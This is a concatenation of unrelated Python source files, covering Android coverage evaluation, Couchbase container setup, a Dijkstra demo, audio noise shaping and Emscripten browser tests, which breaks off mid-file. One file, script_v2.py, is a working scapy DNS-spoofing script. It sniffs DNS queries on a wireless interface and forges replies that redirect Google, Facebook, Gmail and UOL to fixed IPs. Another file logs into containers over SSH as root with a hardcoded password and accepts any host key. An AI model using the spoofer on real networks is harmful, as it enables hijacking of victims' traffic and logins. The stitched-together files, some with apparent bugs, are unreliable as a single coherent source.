@fixture
def driver_info():
""" Base class for test cases that integrate with a server.
"""
return {
"uri_bolt": "bolt://localhost:9001",
"uri_neo4j": "neo4j://localhost:9001",
"user": "test",
"password": "test",
"auth_token": ("test", "test")
}
|
CoverageEvaluator.py
|
# Evaluate DroidBot with androcov
# basic idea is:
# A tool is better if it has higher coverage
import argparse
import os
import logging
import sys
import threading
import time
import subprocess
from datetime import datetime
from droidbot.droidbot import DroidBot
START_EMULATOR_CMD = "emulator -avd %s -port %d -wipe-data"
AVD_PORT = 5564
class CoverageEvaluator(object):
"""
evaluate test tool with DroidBox
make sure you have started droidbox emulator before evaluating
"""
MODE_DEFAULT = "1.default"
MODE_MONKEY = "2.monkey"
MODE_RANDOM = "3.random"
MODE_STATIC = "4.static"
MODE_DYNAMIC = "5.dynamic"
def __init__(self, start_emu_cmd, device_serial, apk_path,
event_duration, event_count, event_interval,
output_dir, androcov_path, android_jar_path):
self.modes = {
CoverageEvaluator.MODE_DEFAULT: self.default_mode,
CoverageEvaluator.MODE_MONKEY: self.adb_monkey,
# CoverageEvaluator.MODE_RANDOM: self.droidbot_random,
# CoverageEvaluator.MODE_STATIC: self.droidbot_static,
CoverageEvaluator.MODE_DYNAMIC: self.droidbot_dynamic
}
self.logger = logging.getLogger(self.__class__.__name__)
self.start_emu_cmd = start_emu_cmd
self.device_serial = device_serial
self.apk_path = os.path.abspath(apk_path)
self.output_dir = output_dir
self.androcov_path = androcov_path
self.android_jar_path = android_jar_path
if self.output_dir is None:
self.output_dir = "evaluation_reports/"
self.output_dir = os.path.abspath(self.output_dir)
if not os.path.exists(self.output_dir):
os.mkdir(self.output_dir)
self.temp_dir = os.path.join(self.output_dir, "temp")
if os.path.exists(self.temp_dir):
import shutil
shutil.rmtree(self.temp_dir)
os.mkdir(self.temp_dir)
self.androcov_output_dir = os.path.join(self.temp_dir, "androcov_out")
os.mkdir(self.androcov_output_dir)
self.output_dirs = {}
for mode in self.modes:
self.output_dirs[mode] = os.path.join(self.output_dir, mode)
self.androcov = self.androcov_instrument()
self.apk_path = self.androcov.apk_path
now = datetime.now()
self.report_title = now.strftime("Evaluation_Report_%Y-%m-%d_%H%M")
result_file_name = self.report_title + ".md"
self.result_file_path = os.path.join(self.output_dir, result_file_name)
self.event_duration = event_duration
if self.event_duration is None:
self.event_duration = 200
self.event_count = event_count
if self.event_count is None:
self.event_count = 200
self.event_interval = event_interval
if self.event_interval is None:
self.event_interval = 2
self.record_interval = self.event_duration / 20
if self.record_interval < 2:
self.record_interval = 2
self.emulator = None
self.droidbot = None
self.result = {}
self.logger.info("Evaluator initialized")
self.logger.info("apk_path:%s\n"
"duration:%d\ncount:%d\ninteval:%d\nreport title:%s" %
(self.apk_path, self.event_duration,
self.event_count, self.event_interval, self.report_title))
self.enabled = True
def start_evaluate(self):
"""
start droidbox testing
:return:
"""
if not self.enabled:
return
for mode in self.modes:
self.evaluate_mode(mode, self.modes[mode])
self.dump_result(sys.stdout)
result_file = open(self.result_file_path, "w")
self.dump_result(result_file)
result_file.close()
def androcov_instrument(self):
"""
instrument the app with androcov
@return:
"""
subprocess.check_call(["java", "-jar", self.androcov_path,
"-i", self.apk_path, "-o", self.androcov_output_dir,
"-sdk", self.android_jar_path])
import androcov_report
return androcov_report.Androcov(androcov_dir=self.androcov_output_dir)
def evaluate_mode(self, mode, target):
"""
evaluate a particular mode
:param mode: str of mode
:param target: the target function to run
:return:
"""
if not self.enabled:
return
self.logger.info("evaluating [%s] mode" % mode)
self.start_emulator()
target_thread = threading.Thread(target=target)
target_thread.start()
self.monitor_and_record(mode)
self.stop_modules()
self.stop_emulator()
self.logger.info("finished evaluating [%s] mode" % mode)
def start_emulator(self):
self.emulator = subprocess.Popen(self.start_emu_cmd.split(),
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
self.wait_for_device()
def stop_modules(self):
if self.droidbot is not None:
self.droidbot.stop()
time.sleep(5)
def stop_emulator(self):
if not self.emulator:
return
self.emulator.terminate()
time.sleep(5)
def wait_for_device(self):
"""
wait until the device is fully booted
:return:
"""
try:
subprocess.check_call(["adb", "-s", self.device_serial, "wait-for-device"])
while True:
out = subprocess.check_output(["adb", "-s", self.device_serial, "shell",
"getprop", "init.svc.bootanim"]).split()[0]
if out == "stopped":
break
time.sleep(3)
except:
self.logger.warning("error waiting for device")
def monitor_and_record(self, mode):
if not self.enabled:
return
self.result[mode] = {}
self.logger.info("start monitoring")
try:
time.sleep(self.event_duration)
except KeyboardInterrupt:
self.stop()
mode_logcat_path = os.path.join(self.output_dirs[mode], "logcat.log")
self.result[mode] = self.androcov.gen_androcov_report(mode_logcat_path)
self.logger.info("stop monitoring")
self.logger.debug(self.result)
def stop(self):
self.enabled = False
def start_droidbot(self, env_policy, event_policy, output_dir):
"""
start droidbot with given arguments
:param env_policy: policy to deploy environment
:param event_policy: policy to send events
:param output_dir: droidbot output directory
:return:
"""
if not self.enabled:
return
self.logger.info("starting droidbot")
self.droidbot = DroidBot(device_serial=self.device_serial,
app_path=self.apk_path,
env_policy=env_policy,
event_policy=event_policy,
event_count=self.event_count,
event_duration=self.event_duration,
event_interval=self.event_interval,
output_dir=output_dir,
quiet=True)
self.droidbot.start()
def default_mode(self):
self.start_droidbot(env_policy="none",
event_policy="none",
output_dir=self.output_dirs[CoverageEvaluator.MODE_DEFAULT])
def adb_monkey(self):
"""
try droidbot "monkey" mode
:return:
"""
self.start_droidbot(env_policy="none",
event_policy="monkey",
output_dir=self.output_dirs[CoverageEvaluator.MODE_MONKEY])
def droidbot_random(self):
"""
try droidbot "random" mode
:return:
"""
self.start_droidbot(env_policy="none",
event_policy="random",
output_dir=self.output_dirs[CoverageEvaluator.MODE_RANDOM])
def droidbot_static(self):
"""
try droidbot "static" mode
:return:
"""
self.start_droidbot(env_policy="none",
event_policy="static",
output_dir=self.output_dirs[CoverageEvaluator.MODE_STATIC])
def droidbot_dynamic(self):
"""
try droidbot "dynamic" mode
:return:
"""
self.start_droidbot(env_policy="none",
event_policy="dynamic",
output_dir=self.output_dirs[CoverageEvaluator.MODE_DYNAMIC])
def result_safe_get(self, mode_tag=None, item_key=None, timestamp=None):
"""
get an item from result
"""
if mode_tag is None:
return self.result
if mode_tag in self.result:
result_mode = self.result[mode_tag]
if item_key is None:
return result_mode
if isinstance(result_mode, dict) and item_key in result_mode:
result_item = result_mode[item_key]
if timestamp is None:
return result_item
if isinstance(result_item, dict) and timestamp in result_item:
return result_item[timestamp]
return None
def dump_result(self, out_file):
modes = self.result_safe_get()
if modes is None or not modes:
return
else:
modes = list(modes.keys())
modes.sort()
out_file.write("# %s\n\n" % self.report_title)
out_file.write("## About\n\n")
out_file.write("This report is generated automatically by %s "
"with options:\n\n"
"+ apk_path=%s\n"
"+ event_duration=%s\n"
"+ event_interval=%s\n"
"+ event_count=%s\n\n"
% (self.__class__.__name__, os.path.basename(self.apk_path),
self.event_duration, self.event_interval, self.event_count))
out_file.write("## Apk Info\n\n")
out_file.write("|Item|Value|\n")
out_file.write("|----|----|\n")
out_file.write("|Package Name|%s|\n" % self.droidbot.app.get_package_name())
out_file.write("|Main Activity|%s|\n" % self.droidbot.app.get_main_activity())
apk_hashes = self.droidbot.app.get_hashes()
out_file.write("|Hash (md5)|%s|\n" % apk_hashes[0])
out_file.write("|Hash (sha1)|%s|\n" % apk_hashes[1])
out_file.write("|Hash (sha256)|%s|\n\n" % apk_hashes[2])
out_file.write("### Permissions\n\n")
permissions = self.droidbot.app.get_androguard_analysis().a.get_permissions()
for permission in permissions:
out_file.write("+ %s\n" % permission)
out_file.write("\n## Data\n\n")
out_file.write("### Summary\n\n")
# gen head lines
th1 = "|\titem\t|"
th2 = "|----|"
for mode in modes:
th1 += "\t%s\t|" % mode
th2 += "----|"
th1 += "\n"
th2 += "\n"
out_file.write(th1)
out_file.write(th2)
# gen content
item_keys = self.result_safe_get(modes[0])
if item_keys is None:
item_keys = []
else:
item_keys = item_keys.keys()
for item_key in item_keys:
item_sample_value = self.result_safe_get(modes[0], item_key)
if item_sample_value is None:
continue
if not isinstance(item_sample_value, str)\
and not isinstance(item_sample_value, int)\
and not isinstance(item_sample_value, float):
continue
tl = "|\t%s\t|" % item_key
for mode in modes:
item_value = self.result_safe_get(mode, item_key)
tl += "\t%s\t|" % item_value
tl += "\n"
out_file.write(tl)
out_file.write("\n### Tendency\n\n")
# gen head lines
th1 = "|\ttime\t|"
th2 = "|----|"
for mode in modes:
th1 += "\t%s\t|" % mode
th2 += "----|"
th1 += "\n"
th2 += "\n"
out_file.write(th1)
out_file.write(th2)
# gen content
timestamps = []
for mode in modes:
mode_timestamps = self.result_safe_get(mode, "timestamp_count")
if not isinstance(mode_timestamps, dict):
continue
timestamps.extend(mode_timestamps)
timestamps = sorted(set(timestamps))
reached_method_count_in_last_timestamp = {}
for mode in modes:
reached_method_count_in_last_timestamp[mode] = 0
for timestamp in timestamps:
tl = "|\t%d\t|" % timestamp
for mode in modes:
# all_methods_count = self.result_safe_get(mode, "all_methods_count")
reached_method_count = self.result_safe_get(mode, "timestamp_count", timestamp)
if isinstance(reached_method_count, int):
reached_method_count_in_last_timestamp[mode] = reached_method_count
else:
reached_method_count = reached_method_count_in_last_timestamp[mode]
tl += "\t%s\t|" % reached_method_count
tl += "\n"
out_file.write(tl)
out_file.flush()
def parse_args():
"""
parse command line input
generate options including host name, port number
"""
description = "Run different testing bots on droidbox, and compare their log counts."
parser = argparse.ArgumentParser(description=description,
formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument("-avd", action="store", dest="avd_name", required=True,
help="avd name of target emulator")
parser.add_argument("-a", action="store", dest="apk_path", required=True,
help="file path of target app, necessary for static analysis")
parser.add_argument("-count", action="store", dest="event_count",
type=int, help="number of events to generate during testing")
parser.add_argument("-interval", action="store", dest="event_interval",
type=int, help="interval between two events (seconds)")
parser.add_argument("-duration", action="store", dest="event_duration",
type=int, help="duration of droidbot running (seconds)")
parser.add_argument("-o", action="store", dest="output_dir",
help="directory of output")
parser.add_argument("-androcov", action="store", dest="androcov_path", required=True,
help="path to androcov.jar")
parser.add_argument("-sdk", action="store", dest="android_jar_path", required=True,
help="path to Sdk/platforms/android-XX/android.jar")
options = parser.parse_args()
# print options
return options
if __name__ == "__main__":
opts = parse_args()
logging.basicConfig(level=logging.INFO)
device_serial = "emulator-%d" % AVD_PORT
start_emu_cmd = START_EMULATOR_CMD % (opts.avd_name, AVD_PORT)
evaluator = CoverageEvaluator(
start_emu_cmd=start_emu_cmd,
device_serial=device_serial,
apk_path=opts.apk_path,
event_duration=opts.event_duration,
event_count=opts.event_count,
event_interval=opts.event_interval,
output_dir=opts.output_dir,
androcov_path=opts.androcov_path,
android_jar_path=opts.android_jar_path
)
try:
evaluator.start_evaluate()
except KeyboardInterrupt:
evaluator.stop()
evaluator.dump_result(sys.stdout)
|
create_cb_containers.py
|
#!/usr/bin/env/python
import os, sys, argparse, json, subprocess, paramiko, requests, time, threading
from scp import SCPClient
spark_worker_container='spark_worker'
spark_master_container='spark_master'
couchbase_container='couchbase_base'
couchbase_ips = []
spark_worker_ips = []
spark_master_ips = []
container_prefix = "dockercb"
cluster_config_file = "config.json"
buckets = ['default']
masterIp = None
masterClient = None
def run_command(args):
p = subprocess.Popen(args)
p.wait()
if p.returncode != 0:
print('{0} failed with exit status'.format(p.returncode))
os._exit(1)
def get_ips_and_configure(cb_nodes, prefix, download_url, descfile):
for i in range(1, int(cb_nodes) + 1):
container_id = "{0}_{1}_{2}".format(prefix, couchbase_container, i)
args = ["docker", "inspect", "--format='{{.NetworkSettings.IPAddress}}'", container_id]
print('the args are', args)
process = subprocess.Popen(args, stdout=subprocess.PIPE)
out, err = process.communicate()
print('out is', out)
print('err is', err)
if out.rstrip() == '':
print('failed to get an IP')
return
else:
couchbase_ips.append(out.rstrip())
print('the ips are', couchbase_ips)
with open(descfile, "w+") as f:
json.dump( couchbase_ips, f)
tasks = []
lock = threading.Lock()
for i in range(0, int(cb_nodes)):
isMaster = False
if i == 0:
isMaster = True
task = threading.Thread(target=install_couchbase, args=(couchbase_ips[i], download_url, isMaster))
task.start()
tasks.append(task)
[task.join() for task in tasks]
time.sleep(20) #install should not take longer than this - use a better way
for i in range(0, int(cb_nodes)):
print('requesting from', "http://{0}:8091/pools".format(couchbase_ips[i]))
r = requests.get("http://{0}:8091/pools".format(couchbase_ips[i]))
if r.status_code != 200:
print("Server not installed correctly. Received status code:".format(r.status_code))
os._exit(1)
#initialize_nodes_rebalance(couchbase_ips)
def install_couchbase(ip, url, isMaster):
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
print('the ip is', ip)
client.connect(ip, username="root", password="root")
scp = SCPClient(client.get_transport())
if isMaster == True:
global masterClient
masterClient = client
global masterIp
masterIp = ip
scp = SCPClient(client.get_transport())
scp.put('cluster-install.py', 'cluster-install.py')
command = "python cluster-install.py {0}".format(url)
(stdin, stdout, stderr) = client.exec_command(command)
for line in stdout.readlines():
print(line)
if isMaster != True:
client.close()
def start_environment(cbnodes, prefix):
cb_args = "couchbase_base={0}".format(cbnodes)
args = ["docker-compose", "-p='{0}'".format(prefix), "scale", cb_args] #, "spark_master=1", spark_worker_args]
print('start environment args are', args)
run_command(args)
def cleanup_environment():
args = ["python", "stop_cluster.py", "--prefix={0}".format(container_prefix)]
run_command(args)
parser = argparse.ArgumentParser(description='Setup couchbase and spark clusters. Currently supports one spark master')
parser.add_argument('--cb-nodes', dest='cbnodes', required=True, help='Number of couchbase nodes in cb cluster')
parser.add_argument('--desc-file', dest='descfile', required=True, help='File to put the IPs in')
parser.add_argument('--url', dest='url', required=True, help='Couchbase-server version')
parser.add_argument('--desc', dest='desc', required=True, help='Identify the user')
args = parser.parse_args()
#cleanup_environment()
prefix = 'cbserver' + args.desc
print('the prefix is', prefix)
start_environment(args.cbnodes, prefix)
get_ips_and_configure(args.cbnodes, prefix, args.url, args.descfile)
|
dijkstra.py
|
# Copyright 2016 Uber Technologies, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import logging
import os
import random
import sys
import threading
log = logging.getLogger('dijkstra')
class Graph(object):
"""Representation of a sparse graph."""
def __init__(self, width, height):
self.width = width
self.height = height
self.initial = None
self.goal = None
self.filled = set()
@classmethod
def generate(cls, width, height, count):
graph = cls(width, height)
for _ in xrange(count):
while True:
x, y = graph.random_unfilled()
if (x, y) not in graph:
break
graph.fill_node(x, y)
possibilities = []
for xx in (-1, 0, 1):
for yy in (-1, 0, 1):
possibilities.append((xx, yy))
added = 0
random.shuffle(possibilities)
for px, py in possibilities:
xx = x + px
yy = y + py
if not graph.valid(xx, yy):
continue
if (xx, yy) not in graph:
graph.fill_node(xx, yy)
added += 1
if added == 3:
break
x = xx
y = yy
graph.initial = graph.random_unfilled()
while True:
goal = graph.random_unfilled()
if goal != graph.initial:
graph.goal = goal
break
return graph
def random_unfilled(self):
while True:
x = random.randint(0, self.width - 1)
y = random.randint(0, self.height - 1)
if (x, y) not in self.filled:
return (x, y)
def fill_node(self, x, y):
self.filled.add((x, y))
def valid(self, x, y):
if x < 0 or y < 0:
return False
if x >= self.width or y >= self.height:
return False
return True
def dist(self, x, y):
gx, gy = self.goal
dx = gx - x
dy = gy - y
return dx*dx + dy*dy
def __str__(self):
return '%s(%d, %d, %s) initial=%s goal=%s' % (
self.__class__.__name__, self.width, self.height,
sorted(self.filled), self.initial, self.goal)
def __contains__(self, elem):
return elem in self.filled
def dijkstra(graph):
solution = None
via = {graph.initial: None}
candidates = []
x, y = graph.initial
for xx in (-1, 0, 1):
for yy in (-1, 0, 1):
px = x + xx
py = y + yy
point = (px, py)
if graph.valid(px, py) and point not in graph and point not in via:
d = graph.dist(px, py)
candidates.append((d, point))
via[point] = graph.initial
while candidates:
candidates.sort(reverse=True)
d, point = candidates.pop()
if d == 0:
solution = [point]
while True:
next_point = via[point]
solution.append(next_point)
if next_point == graph.initial:
break
else:
point = next_point
solution.reverse()
break
else:
x, y = point
for xx in (-1, 0, 1):
for yy in (-1, 0, 1):
px = x + xx
py = y + yy
new_point = (px, py)
if graph.valid(px, py)\
and new_point not in graph\
and new_point not in via:
d = graph.dist(px, py)
candidates.append((d, new_point))
via[new_point] = point
return solution
def run():
"""Run Dijkstra's algorithm."""
graph = Graph.generate(100, 100, 80)
log.info('initial = %s', graph.initial)
log.info('goal = %s', graph.goal)
solution = dijkstra(graph)
solution_len = 0 if solution is None else len(solution)
log.info('solution = %s, len = %d', solution, solution_len)
def run_times(quiet, times):
"""Run Dijkstra's algorithm in a loop."""
if not quiet:
sys.stdout.write('%d\n' % (os.getpid(),))
sys.stdout.flush()
if times <= 0:
while True:
run()
else:
for _ in xrange(times):
run()
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-q', '--quiet', action='store_true',
help='Be quiet')
parser.add_argument('-v', '--verbose', action='store_true',
help='Be verbose')
parser.add_argument('-t', '--threads', type=int, default=1,
help='Number of threads')
parser.add_argument('-n', '--num', type=int, default=0,
help='Number of iterations')
args = parser.parse_args()
logging.basicConfig()
if args.verbose:
log.setLevel(logging.DEBUG)
if args.threads == 1:
run_times(args.quiet, args.num)
else:
threads = []
for _ in xrange(args.threads):
t = threading.Thread(target=run_times, args=(args.quiet, args.num))
t.start()
threads.append(t)
for i, t in enumerate(threads):
log.info('joined thread %d', i)
t.join()
if __name__ == '__main__':
main()
|
script_v2.py
|
from threading import Thread
from Queue import Queue, Empty
from scapy.all import *
m_iface = "wlan1"
m_finished = False
def print_summary(packet):
target = {'uol.com':'200.147.67.142',
'google.com':'173.194.118.35',
'facebook.com':'173.252.120.6',
'gmail.com':'216.58.222.5'
}
if packet.haslayer(DNS) and packet.getlayer(DNS).qr == 0 and len(target) > 0:
for targetDomain, ipAddressTarget in target.items():
if packet.getlayer(DNS).qd.qname == targetDomain:
try:
requestIP = packet[IP]
requestUDP = packet[UDP]
requestDNS = packet[DNS]
requestDNSQR = packet[DNSQR]
responseIP = IP(src=requestIP.dst, dst=requestIP.src)
responseUDP = UDP(sport = requestUDP.dport, dport = requestUDP.sport)
responseDNSRR = DNSRR(rrname=packet.getlayer(DNS).qd.qname, rdata = ipAddressTarget)
responseDNS = DNS(qr=1,id=requestDNS.id, qd=requestDNSQR, an=responseDNSRR)
answer = responseIP/responseUDP/responseDNS
send(answer)
except:
print "Unexpected error:"
print "Exception..."
else:
print packet.summary()
def threaded_sniff_target(q):
global m_finished
while m_finished:
print("aqui")
sniff(iface = m_iface, count = 10, filter = 'udp port 53', prn = lambda x : q.put(x))
m_finished = True
def threaded_sniff():
q = Queue()
sniffer = Thread(target = threaded_sniff_target, args = (q,))
sniffer.daemon = True
sniffer.start()
while (not m_finished):
try:
pkt = q.get(timeout = 1)
print_summary(pkt)
except Empty:
pass
threaded_sniff()
n = raw_input()
|
multiprocess_timeout.py
|
from multiprocessing import Process
from je_auto_control.utils.exception.exceptions import AutoControlTimeoutException
from je_auto_control.utils.exception.exception_tag import timeout_need_on_main_error
def multiprocess_timeout(check_function, time: int):
try:
new_process = Process(target=check_function)
new_process.start()
new_process.join(timeout=time)
except AutoControlTimeoutException:
raise AutoControlTimeoutException(timeout_need_on_main_error)
new_process.terminate()
if new_process.exitcode is None:
return "timeout"
else:
return "success"
|
noise_shaping.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2017 Tomoki Hayashi (Nagoya University)
# Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
from __future__ import division
from __future__ import print_function
import argparse
from distutils.util import strtobool
import multiprocessing as mp
import os
import sys
import numpy as np
from scipy.io import wavfile
from sprocket.speech.feature_extractor import FeatureExtractor
from sprocket.speech.synthesizer import Synthesizer
from feature_extract import low_cut_filter
from utils import find_files
from utils import read_hdf5
from utils import read_txt
FS = 22050
SHIFTMS = 5
FFTL = 1024
MCEP_DIM_START = 2
MCEP_DIM_END = 37
MCEP_ALPHA = 0.455
MAG = 0.5
def main():
parser = argparse.ArgumentParser(
description="making feature file argsurations.")
parser.add_argument(
"--waveforms", default=None,
help="directory or list of filename of input wavfile")
parser.add_argument(
"--stats", default=None,
help="filename of hdf5 format")
parser.add_argument(
"--writedir", default=None,
help="directory to save preprocessed wav file")
parser.add_argument(
"--fs", default=FS,
type=int, help="Sampling frequency")
parser.add_argument(
"--shiftms", default=SHIFTMS,
type=int, help="Frame shift in msec")
parser.add_argument(
"--fftl", default=FFTL,
type=int, help="FFT length")
parser.add_argument(
"--mcep_dim_start", default=MCEP_DIM_START,
type=int, help="Start index of mel cepstrum")
parser.add_argument(
"--mcep_dim_end", default=MCEP_DIM_END,
type=int, help="End index of mel cepstrum")
parser.add_argument(
"--mcep_alpha", default=MCEP_ALPHA,
type=float, help="Alpha of mel cepstrum")
parser.add_argument(
"--mag", default=MAG,
type=float, help="magnification of noise shaping")
parser.add_argument(
"--verbose", default=1,
type=int, help="log message level")
parser.add_argument(
'--n_jobs', default=1,
type=int, help="number of parallel jobs")
parser.add_argument(
'--inv', default=False, type=strtobool,
help="if True, inverse filtering will be performed")
args = parser.parse_args()
# read list
if os.path.isdir(args.waveforms):
file_list = sorted(find_files(args.waveforms, "*.wav"))
else:
file_list = read_txt(args.waveforms)
# define feature extractor
feature_extractor = FeatureExtractor(
analyzer="world",
fs=args.fs,
shiftms=args.shiftms,
fftl=args.fftl)
# define synthesizer
synthesizer = Synthesizer(
fs=args.fs,
shiftms=args.shiftms,
fftl=args.fftl)
# check directory existence
if not os.path.exists(args.writedir):
os.makedirs(args.writedir)
def noise_shaping(wav_list):
for wav_name in wav_list:
# load wavfile and apply low cut filter
fs, x = wavfile.read(wav_name)
wav_type = x.dtype
x = np.array(x, dtype=np.float64)
# check sampling frequency
if not fs == args.fs:
print("ERROR: sampling frequency is not matched.")
sys.exit(1)
# extract features (only for get the number of frames)
f0, _, _ = feature_extractor.analyze(x)
num_frames = f0.shape[0]
# load average mcep
mlsa_coef = read_hdf5(args.stats, "/mean")
mlsa_coef = mlsa_coef[args.mcep_dim_start:args.mcep_dim_end] * args.mag
mlsa_coef[0] = 0.0
if args.inv:
mlsa_coef[1:] = -1.0 * mlsa_coef[1:]
mlsa_coef = np.tile(mlsa_coef, [num_frames, 1])
# synthesis and write
x_ns = synthesizer.synthesis_diff(
x, mlsa_coef, alpha=args.mcep_alpha)
x_ns = low_cut_filter(x_ns, args.fs, cutoff=70)
if wav_type == np.int16:
write_name = args.writedir + "/" + os.path.basename(wav_name)
wavfile.write(write_name, args.fs, np.int16(x_ns))
else:
wavfile.write(write_name, args.fs, x_ns)
# divie list
file_lists = np.array_split(file_list, args.n_jobs)
file_lists = [f_list.tolist() for f_list in file_lists]
# multi processing
processes = []
for f in file_lists:
p = mp.Process(target=noise_shaping, args=(f,))
p.start()
processes.append(p)
# wait for all process
for p in processes:
p.join()
if __name__ == "__main__":
main()
|
test_browser.py
|
# coding=utf-8
# Copyright 2013 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
import argparse
import json
import multiprocessing
import os
import random
import shlex
import shutil
import subprocess
import time
import unittest
import webbrowser
import zlib
from http.server import BaseHTTPRequestHandler, HTTPServer
from pathlib import Path
from urllib.request import urlopen
from common import BrowserCore, RunnerCore, path_from_root, has_browser, EMTEST_BROWSER, Reporting
from common import create_file, parameterized, ensure_dir, disabled, test_file, WEBIDL_BINDER
from common import read_file, requires_v8, also_with_minimal_runtime
from tools import shared
from tools import ports
from tools.shared import EMCC, WINDOWS, FILE_PACKAGER, PIPE
from tools.shared import try_delete
def test_chunked_synchronous_xhr_server(support_byte_ranges, chunkSize, data, checksum, port):
class ChunkedServerHandler(BaseHTTPRequestHandler):
def sendheaders(s, extra=[], length=len(data)):
s.send_response(200)
s.send_header("Content-Length", str(length))
s.send_header("Access-Control-Allow-Origin", "http://localhost:%s" % port)
s.send_header('Cross-Origin-Resource-Policy', 'cross-origin')
s.send_header('Cache-Control', 'no-cache, no-store, must-revalidate')
s.send_header("Access-Control-Expose-Headers", "Content-Length, Accept-Ranges")
s.send_header("Content-type", "application/octet-stream")
if support_byte_ranges:
s.send_header("Accept-Ranges", "bytes")
for i in extra:
s.send_header(i[0], i[1])
s.end_headers()
def do_HEAD(s):
s.sendheaders()
def do_OPTIONS(s):
s.sendheaders([("Access-Control-Allow-Headers", "Range")], 0)
def do_GET(s):
if s.path == '/':
s.sendheaders()
elif not support_byte_ranges:
s.sendheaders()
s.wfile.write(data)
else:
start, end = s.headers.get("range").split("=")[1].split("-")
start = int(start)
end = int(end)
end = min(len(data) - 1, end)
length = end - start + 1
s.sendheaders([], length)
s.wfile.write(data[start:end + 1])
# CORS preflight makes OPTIONS requests which we need to account for.
expectedConns = 22
httpd = HTTPServer(('localhost', 11111), ChunkedServerHandler)
for i in range(expectedConns + 1):
httpd.handle_request()
def also_with_wasmfs(f):
def metafunc(self, wasmfs, *args, **kwargs):
if wasmfs:
self.set_setting('WASMFS')
self.emcc_args = self.emcc_args.copy() + ['-DWASMFS']
f(self, *args, **kwargs)
else:
f(self, *args, **kwargs)
metafunc._parameterize = {'': (False,),
'wasmfs': (True,)}
return metafunc
def also_with_wasm2js(f):
assert callable(f)
def metafunc(self, with_wasm2js):
assert self.get_setting('WASM') is None
if with_wasm2js:
self.set_setting('WASM', 0)
f(self)
else:
f(self)
metafunc._parameterize = {'': (False,),
'wasm2js': (True,)}
return metafunc
def shell_with_script(shell_file, output_file, replacement):
shell = read_file(path_from_root('src', shell_file))
create_file(output_file, shell.replace('{{{ SCRIPT }}}', replacement))
def is_chrome():
return EMTEST_BROWSER and 'chrom' in EMTEST_BROWSER.lower()
def no_chrome(note='chrome is not supported'):
if is_chrome():
return unittest.skip(note)
return lambda f: f
def is_firefox():
return EMTEST_BROWSER and 'firefox' in EMTEST_BROWSER.lower()
def no_firefox(note='firefox is not supported'):
if is_firefox():
return unittest.skip(note)
return lambda f: f
def no_swiftshader(f):
assert callable(f)
def decorated(self, *args, **kwargs):
if is_chrome() and '--use-gl=swiftshader' in EMTEST_BROWSER:
self.skipTest('not compatible with swiftshader')
return f(self, *args, **kwargs)
return decorated
def requires_threads(f):
assert callable(f)
def decorated(self, *args, **kwargs):
if os.environ.get('EMTEST_LACKS_THREAD_SUPPORT'):
self.skipTest('EMTEST_LACKS_THREAD_SUPPORT is set')
return f(self, *args, **kwargs)
return decorated
def also_with_threads(f):
def decorated(self, *args, **kwargs):
f(self)
if not os.environ.get('EMTEST_LACKS_THREAD_SUPPORT'):
print('(threads)')
self.emcc_args += ['-pthread']
f(self, *args, **kwargs)
return decorated
requires_graphics_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_GRAPHICS_HARDWARE'), "This test requires graphics hardware")
requires_sound_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_SOUND_HARDWARE'), "This test requires sound hardware")
requires_sync_compilation = unittest.skipIf(is_chrome(), "This test requires synchronous compilation, which does not work in Chrome (except for tiny wasms)")
requires_offscreen_canvas = unittest.skipIf(os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'), "This test requires a browser with OffscreenCanvas")
class browser(BrowserCore):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.browser_timeout = 60
if EMTEST_BROWSER != 'node':
print()
print('Running the browser tests. Make sure the browser allows popups from localhost.')
print()
def setUp(self):
super().setUp()
# avoid various compiler warnings that many browser tests currently generate
self.emcc_args += [
'-Wno-pointer-sign',
'-Wno-int-conversion',
]
def test_sdl1_in_emscripten_nonstrict_mode(self):
if 'EMCC_STRICT' in os.environ and int(os.environ['EMCC_STRICT']):
self.skipTest('This test requires being run in non-strict mode (EMCC_STRICT env. variable unset)')
# TODO: This test is verifying behavior that will be deprecated at some point in the future, remove this test once
# system JS libraries are no longer automatically linked to anymore.
self.btest('hello_world_sdl.cpp', reference='htmltest.png')
def test_sdl1(self):
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-lSDL', '-lGL'])
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-sUSE_SDL', '-lGL']) # is the default anyhow
def test_sdl1_es6(self):
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-sUSE_SDL', '-lGL', '-sEXPORT_ES6'])
# Deliberately named as test_zzz_* to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
def test_zzz_html_source_map(self):
if not has_browser():
self.skipTest('need a browser')
cpp_file = 'src.cpp'
html_file = 'src.html'
# browsers will try to 'guess' the corresponding original line if a
# generated line is unmapped, so if we want to make sure that our
# numbering is correct, we need to provide a couple of 'possible wrong
# answers'. thus, we add some printf calls so that the cpp file gets
# multiple mapped lines. in other words, if the program consists of a
# single 'throw' statement, browsers may just map any thrown exception to
# that line, because it will be the only mapped line.
create_file(cpp_file, r'''
#include <cstdio>
int main() {
printf("Starting test\n");
try {
throw 42; // line 8
} catch (int e) { }
printf("done\n");
return 0;
}
''')
# use relative paths when calling emcc, because file:// URIs can only load
# sourceContent when the maps are relative paths
try_delete(html_file)
try_delete(html_file + '.map')
self.compile_btest(['src.cpp', '-o', 'src.html', '-gsource-map'])
self.assertExists(html_file)
self.assertExists('src.wasm.map')
webbrowser.open_new('file://' + html_file)
print('''
If manually bisecting:
Check that you see src.cpp among the page sources.
